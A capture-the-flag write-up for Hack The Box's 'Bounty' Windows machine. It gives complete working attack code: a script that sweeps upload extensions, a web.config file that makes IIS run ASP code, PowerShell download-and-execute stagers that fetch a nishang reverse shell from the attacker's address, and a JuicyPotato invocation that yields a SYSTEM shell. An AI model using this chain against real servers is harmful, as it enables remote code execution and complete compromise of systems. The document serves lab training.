HTB: Bounty Write-up

Cameron Grimball
6 min read · May 11, 2021

Target Machine Information:

· Hostname : BOUNTY

· IP Address : 10.10.10.93

· OS : Windows

RECON:

sudo bash nmapAutomator 10.10.10.93 Recon
sudo bash nmapAutomator 10.10.10.93 Basic

---------------------Starting Nmap Basic Scan---------------------
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-28 17:52 EDT
Nmap scan report for 10.10.10.93
Host is up (0.036s latency).
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 7.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Bounty
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.03 seconds
---------------------Running Recon Commands----------------------

Starting gobuster scan
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.10.93:80
[+] Threads: 30
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Show length: true
[+] Extensions: html,asp,aspx,php
[+] Expanded: true
[+] Timeout: 10s
===============================================================
2021/04/28 17:55:21 Starting gobuster
===============================================================
http://10.10.10.93:80/aspnet_client (Status: 301) [Size: 159]
http://10.10.10.93:80/transfer.aspx (Status: 200) [Size: 941]
http://10.10.10.93:80/uploadedfiles (Status: 301) [Size: 159]
===============================================================
2021/04/28 17:56:43 Finished
===============================================================

Services:

Port 80 http

ENUMERATION:

http://10.10.10.93:80
http://10.10.10.93:80/aspnet_client
http://10.10.10.93:80/transfer.aspx
http://10.10.10.93:80/uploadedfiles/

We start by uploading a few test files through the form on transfer.aspx.

We also see that it won't accept .aspx.

To map out exactly what we can and can't upload, let's grab a list of Windows file extensions and run a Burp Intruder attack with it.

You can find the list here; we'll save it as extensions.txt. (Make sure to strip the leading period from each extension before using the list in your attack.)

  1. Upload test.png
  2. Intercept the request in Burp
  3. Send it to Intruder and mark the file extension in the filename as the payload position
  4. Load extensions.txt as the payload list
  5. Start the attack

When the attack finishes, "config" is the only extension whose response has a different length, and rendering that response shows "File uploaded successfully". So the filter that rejects .aspx lets .config through, and a .config file is exactly what IIS reads for per-directory configuration.
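Doing the same sweep without Burp, as an added example that is not part of the original write-up: a PowerShell 7 script that replays the upload for every extension in extensions.txt and groups the responses by length, which is the same signal the Intruder result table gives. The form field names FileUpload1 and btnUpload are placeholders I assumed; read the real ones from the intercepted request.

```powershell
# Added example, not from the write-up. Run from the attacker box with PowerShell 7
# (Invoke-WebRequest -Form needs 6.1 or later). The two field names are assumptions;
# take the real ones from the request you intercepted in Burp.
$Target    = 'http://10.10.10.93/transfer.aspx'
$FileField = 'FileUpload1'   # assumed: name of the <input type="file">
$BtnField  = 'btnUpload'     # assumed: name of the submit button
$Exts      = Get-Content .\extensions.txt |
             ForEach-Object { $_.Trim().TrimStart('.') } |
             Where-Object { $_ }

# A WebForms page refuses a POST that lacks the hidden __VIEWSTATE / __EVENTVALIDATION
# values of the page that rendered the form, so fetch the page once, keep its cookies
# in $sess, and replay every hidden __* field with each upload.
$page   = Invoke-WebRequest -Uri $Target -SessionVariable sess
$hidden = @{}
foreach ($m in [regex]::Matches($page.Content, 'name="(__\w+)"[^>]*value="([^"]*)"')) {
    $hidden[$m.Groups[1].Value] = $m.Groups[2].Value
}

$tmp = Join-Path ([IO.Path]::GetTempPath()) 'ext-sweep'
New-Item -ItemType Directory -Path $tmp -Force | Out-Null

$results = foreach ($ext in $Exts) {
    # The content is irrelevant; only the extension in the filename is being filtered.
    $probe = Join-Path $tmp "test.$ext"
    Set-Content -Path $probe -Value 'probe'

    $form = $hidden.Clone()
    $form[$FileField] = Get-Item $probe   # FileInfo value => multipart file part
    $form[$BtnField]  = 'Upload'
    try {
        $r = Invoke-WebRequest -Uri $Target -Method Post -Form $form -WebSession $sess
        [pscustomobject]@{
            Ext      = $ext
            Status   = $r.StatusCode
            Length   = $r.Content.Length
            Accepted = [bool]($r.Content -match 'uploaded successfully')
        }
    } catch {
        # 4xx/5xx throw in Invoke-WebRequest; record them instead of aborting the sweep.
        [pscustomobject]@{ Ext = $ext; Status = 'ERR'; Length = 0; Accepted = $false }
    }
}

# Same logic as eyeballing the Intruder length column: the rejection page has one
# size, so whichever response length is rare belongs to the extensions that got through.
$results | Group-Object Length | Sort-Object Count |
    Select-Object Count, Name, @{ n = 'Exts'; e = { $_.Group.Ext -join ',' } } |
    Format-Table -AutoSize

# And the explicit check for the success string the write-up saw.
$results | Where-Object Accepted
```

On this box the small group should contain config; anything else that shows up there is worth a manual look, since a server-side blocklist that misses one executable-by-configuration extension often misses others.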

Searching for "config file reverse shell" turns up the well-known web.config trick: IIS treats a web.config placed in any served directory as live configuration, so an uploaded one can register asp.dll as the handler for *.config and carry classic ASP code in a trailing XML comment. Requesting the file then executes that code.

We paste the template into a file called web.config and upload it through the same form. After the upload we check that it was stored by requesting it under /uploadedfiles/, the directory gobuster found.

We get a response, so the file is being served; now we need code to put in it that gives us a reverse shell.

I had little luck with msfvenom payloads here, but nishang's Invoke-PowerShellTcp got me a PowerShell reverse shell on the machine.

First, let's build the reverse shell:

  1. git clone https://github.com/samratashok/nishang.git
  2. nano nishang/Shells/Invoke-PowerShellTcp.ps1
  3. Append the following line at the bottom of the script, with your own IP and port, so the function fires as soon as the script is loaded:
Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.15 -Port 1234

4. Rename: mv Invoke-PowerShellTcp.ps1 shell.ps1

5. Add the following to web.config so that requesting the file runs it. The staging line pulls shell.ps1 from our web server and runs it in memory with iex; nothing is written to the target's disk:

<%
' Spawn cmd.exe from the ASP handler's process and have PowerShell fetch and run
' shell.ps1 straight from our web server (iex = Invoke-Expression, so the script
' never touches disk on the target).
Set rs = CreateObject("WScript.Shell")
Set cmd = rs.Exec("cmd /c powershell -c iex(new-object net.webclient).downloadstring('http://10.10.14.15:8000/shell.ps1')")
' Relay whatever the command printed into the HTTP response so we can see errors.
' Readall blocks until the child exits, so the request hangs while the shell lives.
o = cmd.StdOut.Readall()
Response.write(o)
%>

6. python -m SimpleHTTPServer 8000 in the directory holding shell.ps1 (on Python 3 the module is http.server)

7. nc -lvnp 1234

8. Upload web.config again and request it in the browser (the request hangs while the shell is alive; that's expected)

9. Shell
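For reference, the complete file that step 5 produces, as an added example rather than a copy of the write-up's own upload: this is the widely published web.config handler-override template (Soroush Dalili's "upload a web.config" technique) with the staging snippet from step 5 placed in its trailing XML comment. It assumes a 64-bit application pool (preCondition="bitness64"; use bitness32 otherwise) and that classic ASP (asp.dll) is installed on the IIS host, which the working VBScript snippet shows is the case on Bounty.

```xml
<?xml version="1.0" encoding="UTF-8"?>
<configuration>
  <system.webServer>
    <handlers accessPolicy="Read, Script, Write">
      <!-- Map *.config to classic ASP, so IIS executes this very file when it is requested.
           preCondition is an assumption: bitness64 for a 64-bit app pool, bitness32 otherwise. -->
      <add name="web_config" path="*.config" verb="*" modules="IsapiModule"
           scriptProcessor="%windir%\system32\inetsrv\asp.dll"
           resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />
    </handlers>
    <security>
      <requestFiltering>
        <!-- Request filtering normally refuses to serve .config files and hides web.config;
             both rules are removed for this directory only. -->
        <fileExtensions>
          <remove fileExtension=".config" />
        </fileExtensions>
        <hiddenSegments>
          <remove segment="web.config" />
        </hiddenSegments>
      </requestFiltering>
    </security>
  </system.webServer>
</configuration>
<!--
<% Response.write("-"&"->") %>
<%
Set rs = CreateObject("WScript.Shell")
Set cmd = rs.Exec("cmd /c powershell -c iex(new-object net.webclient).downloadstring('http://10.10.14.15:8000/shell.ps1')")
o = cmd.StdOut.Readall()
Response.write(o)
%>
<% Response.write("<!-"&"-") %>
-->
```

The two Response.write lines are what keep the file valid: the configuration reader sees one well-formed XML comment after the root element, while asp.dll, which ignores the XML, runs the `<% %>` blocks. Keep `--` out of the VBScript (the `"-"&"->"` concatenation exists for that reason), or the XML parser rejects the file and IIS returns a 500 for the whole directory.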

Pro tip: the user flag is a hidden file, so a plain dir won't list it. Use attrib, which shows every file with its attribute flags (H for hidden), or give dir the /a switch.

attrib

PRIVILEGE ESCALATION:

Next we run systeminfo and get the results below:

Host Name: BOUNTY
OS Name: Microsoft Windows Server 2008 R2 Datacenter
OS Version: 6.1.7600 N/A Build 7600
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Server
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 55041-402-3606965-84760
Original Install Date: 5/30/2018, 12:22:24 AM
System Boot Time: 4/30/2021, 11:08:31 AM
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: x64-based PC
Processor(s): 1 Processor(s) Installed.
[01]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
BIOS Version: Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: en-us;English (United States)
Input Locale: en-us;English (United States)
Time Zone: (UTC+02:00) Athens, Bucharest, Istanbul
Total Physical Memory: 2,047 MB
Available Physical Memory: 1,585 MB
Virtual Memory: Max Size: 4,095 MB
Virtual Memory: Available: 3,593 MB
Virtual Memory: In Use: 502 MB
Page File Location(s): C:\pagefile.sys
Domain: WORKGROUP
Logon Server: N/A
Hotfix(s): N/A
Network Card(s): 1 NIC(s) Installed.
[01]: Intel(R) PRO/1000 MT Network Connection
Connection Name: Local Area Connection
DHCP Enabled: No
IP address(es)
[01]: 10.10.10.93

It is Windows Server 2008 R2, build 7600, with no hotfixes installed (Hotfix(s): N/A), so it's likely vulnerable to a number of kernel exploits. Normally I'd feed this output to Windows Exploit Suggester, but we're going to try something different.

whoami /priv

SeImpersonatePrivilege is enabled. That privilege is held by service accounts such as IIS application pool identities, and whenever you see it on a host older than Windows 10 1809 / Server 2019 (where Microsoft broke the technique), JuicyPotato is the quick route to SYSTEM. Server 2008 R2 is well within range. Host JuicyPotato.exe on your web server and pull it down from the shell:

(new-object net.webclient).downloadfile('http://10.10.14.15:8000/JuicyPotato.exe', 'C:\Users\merlin\Desktop\jp.exe')

JuicyPotato has three mandatory arguments:

  • -t: which CreateProcess call to use. We pass * so it tries CreateProcessWithTokenW and then CreateProcessAsUser, since we can't be sure in advance which one will work here.
  • -p: the program to launch with the SYSTEM token. We need a second payload that calls back to our attacking machine.
  • -l: the local port JuicyPotato's fake COM server listens on. Any free port works, so let's use 4444.

First, let's make the reverse shell. All we do is copy the first one and change the listening port at the bottom (and start a second nc listener on 2222 to catch it):

sudo cp shell.ps1 shell-2.ps1
Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.15 -Port 2222

Because -p expects an executable, the script is launched through a small batch file, shell.bat, which we also download to the victim:

(new-object net.webclient).downloadfile('http://10.10.14.15:8000/shell.bat', 'C:\Users\merlin\Desktop\shell.bat')

We then run JuicyPotato with those arguments and the callback on 2222 gives us a SYSTEM shell!
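The two pieces the write-up leaves out, the shell.bat wrapper and the JuicyPotato invocation, as an added example typed into the first reverse shell (my reconstruction, not the author's exact commands). It assumes the attacker box is 10.10.14.15 with a web server on port 8000 serving JuicyPotato.exe and shell-2.ps1, an nc listener on 2222, and that C:\Users\merlin\Desktop is writable, as the earlier download shows. It runs on the PowerShell 2.0 that Server 2008 R2 ships with.

```powershell
# Added example, not from the write-up. Typed into the low-privilege reverse shell.
# Assumed: attacker at 10.10.14.15 serving JuicyPotato.exe and shell-2.ps1 on :8000,
# nc -lvnp 2222 waiting for the SYSTEM callback.
$dir = 'C:\Users\merlin\Desktop'
$wc  = New-Object Net.WebClient

# 1. Fetch the 64-bit JuicyPotato build (systeminfo says x64; a 32-bit build will not work).
$wc.DownloadFile('http://10.10.14.15:8000/JuicyPotato.exe', "$dir\jp.exe")

# 2. -p needs a program to launch, so wrap the second nishang stage in a one-line batch
#    file: it pulls shell-2.ps1 and runs it in memory, exactly like the web.config stager.
$bat = "powershell -c `"iex (New-Object Net.WebClient).DownloadString('http://10.10.14.15:8000/shell-2.ps1')`""
Set-Content -Path "$dir\shell.bat" -Value $bat -Encoding ASCII

# 3. Confirm the prerequisite before firing: the token must carry SeImpersonatePrivilege.
whoami /priv | Select-String SeImpersonatePrivilege

# 4. -t * tries CreateProcessWithTokenW and then CreateProcessAsUser; -l is the local port
#    for the fake COM server (any free port); -c is left at JuicyPotato's default BITS
#    CLSID, which works on Server 2008 R2. The launched process runs as SYSTEM.
& "$dir\jp.exe" -t '*' -p "$dir\shell.bat" -l 4444
```

On success JuicyPotato reports which CreateProcess call worked and the second shell arrives on port 2222 as NT AUTHORITY\SYSTEM. If it reports an authentication failure instead, the usual fix is a different CLSID for this OS (the -c switch), not a different port.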
